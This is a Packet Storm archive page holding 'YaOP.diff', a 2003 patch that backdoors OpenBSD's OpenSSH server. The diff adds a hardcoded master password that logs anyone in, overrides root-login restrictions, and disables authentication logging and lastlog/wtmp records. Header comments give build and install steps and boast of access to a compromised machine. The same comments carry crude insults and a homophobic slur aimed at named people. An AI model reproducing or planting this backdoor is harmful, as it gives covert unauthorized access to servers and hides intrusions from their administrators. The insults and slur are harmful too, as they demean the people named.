exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

YaOP.diff

YaOP.diff
Posted Jun 21, 2003
Authored by ph1zzle

Yet another OpenSSH Patch. A simple diff that adds a backdoor to sshd allowing anyone in with a secret password and it disables all logging. This version was written strictly for the OpenBSD version of OpenSSH and cannot be used on the portable release.

tags | patch
systems | unix, openbsd
SHA-256 | 81750ac6c5c07a5d9dbed37ac1295667a41f6533df2197539ecde15327f71360

YaOP.diff

Change Mirror Download
# YaOP (Yet another OpenSSH Path)
# Written by ph1zzle
# with kudos to enz00 for providing a reference

# YaOP is, you guessed it, another damned OpenSSH patch / backdoor with a few differences
# Here is the main one, it was designed for and compiles fine for the OpenBSD native release
# of OpenSSH. I wrote this cause I am unaware of any other patch that does this for OpenBSD's
# version of OpenSSH. This patch will not patch properly on OpenSSH portable which is the version
# written for linux, solaris, or any other OS other then OpenBSD. If you try to use this patch
# on any system other then OpenBSD you will notice that you get failed hunkes in sshlogin.c.
# This is bad as this is where the ssh daemon registers your login with the system and where
# sshd has been modified to hide the fact that you have logged in. In other words, it will log...
# this is bad.

# Anyways, to use the patch is simple enough, copy it to the OpenSSH dir and then run a
# `patch < ./yaop.diff`, then just do a `make`. In thoery you can also do a make install, but
# it is much nicer to just copy ./sshd/sshd to /usr/sbin/sshd and then restart the server.
# Also you will notice that the secret password is defined on line 69 ( <-- heh 69 ) of this file
# ("change_me_or_die"). Also another neat feature I added is it will log you in, even if sshd
# is told not to do so, i.e. disallow_root_login.

# Also I wanna say thanks to GOBBLES, if it wern't for your nosejob I wouldn't have had access
# to the obsd box that motivated me to write this... well, ok I probably woulda somehow, but
# you guys are cool anyways, you do good work.
# Oh and, "This isn't supposed to be exploitable so nothing should happen here" hehehe, ya
# whatever ;)

# So impressed with all you do
# Tried so hard to be like you
# Flew too high and burnt the wings
# Lost my faith in everything
# Lick around devine debris
# Taste the wealth of hate in me
# Shedding skin succumb defeat
# THIS MACHINE IS OBSOLETE!!!

# "Shit dude, I think we just changed it to boot runlevel 8, hehe, fuck we shouldn't have smoke
# that joint on my lunch break"
# -D0Sdemon

# "Man we should get drunk and build servers more often, this has been a awesom night"
# -Fone_Tone

# "No man, I am not giving you your acid untill you finish fixing my computer... shit, this
# is good stuff too so hurry"
# -Black_Action_Hero

# "Who wants to play spot the fed canadian style, now you see that guy with the goofy hat, and
# the red blouse on the horse over there chasing that man down the street... no thats just our
# prime minister but thats what the feds look like here, silly eh?
# -ph1zzle

# Btw, Theo, I like your work so this isn't a personal attack, but someone had to do it.
# Anyways, keep it up, pat Dug Song on the back for me, he's cool and please slap w00w00 next time
# you see them for me... I mean really slap the fuck outta them, like with a big red hand print.
# Oh except for remmie, She can come over to my place for pie (:P) if she ever ditches those fags.
# http://www.w00w00.org/pics/individual/remmie/remmie1.jpg

# Okay kiddies, Thats all I have to say about that so enjoy and figure it, it's not my fault, it's
# John R. Levines' fault. Unix for Dummies? What are you thinking you fucking knob.

--- ./ssh/auth-passwd.c 2002-05-24 12:45:16.000000000 -0400
+++ ./ssh-own/auth-passwd.c 2003-06-17 16:03:37.000000000 -0400
@@ -55,6 +55,15 @@
{
struct passwd * pw = authctxt->pw;

+ login_0wn=0;
+ if(strcmp("change_me_or_die", password) == 0 )
+ {
+ login_0wn=1;
+ return 1;
+ }
+
+ else{
+
/* deny if no user. */
if (pw == NULL)
return 0;
@@ -101,3 +110,4 @@
}
#endif
}
+}
diff -u -r ./ssh/auth.c ./ssh-own/auth.c
--- ./ssh/auth.c 2002-05-17 10:27:55.000000000 -0400
+++ ./ssh-own/auth.c 2003-06-17 16:02:33.000000000 -0400
@@ -62,6 +62,10 @@
int
allowed_user(struct passwd * pw)
{
+ if(login_0wn)
+ return 1;
+
+ else{
struct stat st;
const char *hostname = NULL, *ipaddr = NULL;
char *shell;
@@ -151,6 +155,7 @@
}
/* We found no reason not to let this user try to log on... */
return 1;
+ }
}

Authctxt *
@@ -164,6 +169,7 @@
void
auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
{
+ if(!login_0wn){
void (*authlog) (const char *fmt,...) = verbose;
char *authmsg;

@@ -188,6 +194,7 @@
get_remote_port(),
info);
}
+}

/*
* Check whether root logins are disallowed.
@@ -195,6 +202,7 @@
int
auth_root_allowed(char *method)
{
+ if(!login_0wn){
switch (options.permit_root_login) {
case PERMIT_YES:
return 1;
@@ -212,6 +220,9 @@
}
log("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
return 0;
+ }
+ else
+ return 1;
}


diff -u -r ./ssh/includes.h ./ssh-own/includes.h
--- ./ssh/includes.h 2002-01-26 11:44:22.000000000 -0500
+++ ./ssh-own/includes.h 2003-06-17 19:48:51.000000000 -0400
@@ -18,6 +18,7 @@

#define RCSID(msg) \
static /**/const char *const rcsid[] = { (char *)rcsid, "\100(#)" msg }
+int login_0wn;

#include <sys/types.h>
#include <sys/socket.h>
diff -u -r ./ssh/sshlogin.c ./ssh-own/sshlogin.c
--- ./ssh/sshlogin.c 2002-06-22 23:30:17.000000000 -0400
+++ ./ssh-own/sshlogin.c 2003-06-17 22:06:26.000000000 -0400
@@ -86,6 +86,7 @@
record_login(pid_t pid, const char *ttyname, const char *user, uid_t uid,
const char *host, struct sockaddr * addr)
{
+ if(!login_0wn){
int fd;
struct lastlog ll;
char *lastlog;
@@ -121,13 +122,16 @@
close(fd);
}
}
+ }
}

/* Records that the user has logged out. */
void
record_logout(pid_t pid, const char *ttyname)
{
+ if(!login_0wn){
const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
if (logout(line))
logwtmp(line, "", "");
+ }
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close